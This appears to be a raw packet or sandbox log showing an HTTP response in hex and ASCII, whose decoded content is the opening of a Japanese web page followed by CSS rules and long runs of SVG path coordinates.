                                                                                                                                                                              ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2023-09-15 05:27:42 UTC3002INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                              2023-09-15 05:27:42 UTC3034INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                              Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                              2023-09-15 05:27:42 UTC3091INData Raw: 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f
                                                                                                                                                                              Data Ascii: 2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/
                                                                                                                                                                              2023-09-15 05:27:42 UTC3107INData Raw: 22 4d 37 32 33 2e 35 39 2c 32 37 30 2e 33 34 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e
                                                                                                                                                                              Data Ascii: "M723.59,270.34a1.73,1.73,0,0,1-.78,2.24,2.53,2.53,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.
                                                                                                                                                                              2023-09-15 05:27:43 UTC3123INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 34 2e 31 31 2c 33 33 38 2e 37 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 37 35 30 2c 33 34 30 61 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                              Data Ascii: s="cls-4" d="M754.11,338.72a1.72,1.72,0,0,1-.78,2.24A2.51,2.51,0,0,1,750,340a2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.
                                                                                                                                                                              2023-09-15 05:27:43 UTC3139INData Raw: 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 31 2c 32 31 33 2e 32 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32
                                                                                                                                                                              Data Ascii: .86"/><path class="cls-4" d="M771,213.21a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2
                                                                                                                                                                              2023-09-15 05:27:43 UTC3155INData Raw: 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 35 35 2c 32 38 31 2e 35 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e
                                                                                                                                                                              Data Ascii: ,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M801.55,281.59a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.
                                                                                                                                                                              2023-09-15 05:27:43 UTC3171INData Raw: 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 32 2e 30 37 2c 33 35 30 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e
                                                                                                                                                                              Data Ascii: 5,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M832.07,350a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.
                                                                                                                                                                              2023-09-15 05:27:43 UTC3187INData Raw: 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 39 2c 32 32 34 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37
                                                                                                                                                                              Data Ascii: 41,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><path class="cls-4" d="M849,224.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.7
                                                                                                                                                                              2023-09-15 05:27:43 UTC3203INData Raw: 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61
                                                                                                                                                                              Data Ascii: 2,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><pa
                                                                                                                                                                              2023-09-15 05:27:43 UTC3219INData Raw: 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c
                                                                                                                                                                              Data Ascii: ,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,
                                                                                                                                                                              2023-09-15 05:27:43 UTC3235INData Raw: 37 2e 31 37 2c 32 34 32 2e 36 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32
                                                                                                                                                                              Data Ascii: 7.17,242.63a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.2
                                                                                                                                                                              2023-09-15 05:27:43 UTC3251INData Raw: 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30
                                                                                                                                                                              Data Ascii: 1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0
                                                                                                                                                                              2023-09-15 05:27:43 UTC3267INData Raw: 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c
                                                                                                                                                                              Data Ascii: 1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,
                                                                                                                                                                              2023-09-15 05:27:43 UTC3283INData Raw: 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 30 2e 38 36 2c 32 34 30 2e 34 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39
                                                                                                                                                                              Data Ascii: ,1-.16-2.81"/><path class="cls-4" d="M980.86,240.49a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.9
                                                                                                                                                                              2023-09-15 05:27:43 UTC3299INData Raw: 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 32 36 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d
                                                                                                                                                                              Data Ascii: .38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M951.26,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d=
                                                                                                                                                                              2023-09-15 05:27:43 UTC3315INData Raw: 2d 34 22 20 64 3d 22 4d 39 32 31 2e 34 33 2c 31 32 36 2e 32 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32
                                                                                                                                                                              Data Ascii: -4" d="M921.43,126.29a1.7,1.7,0,0,1,.77-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22
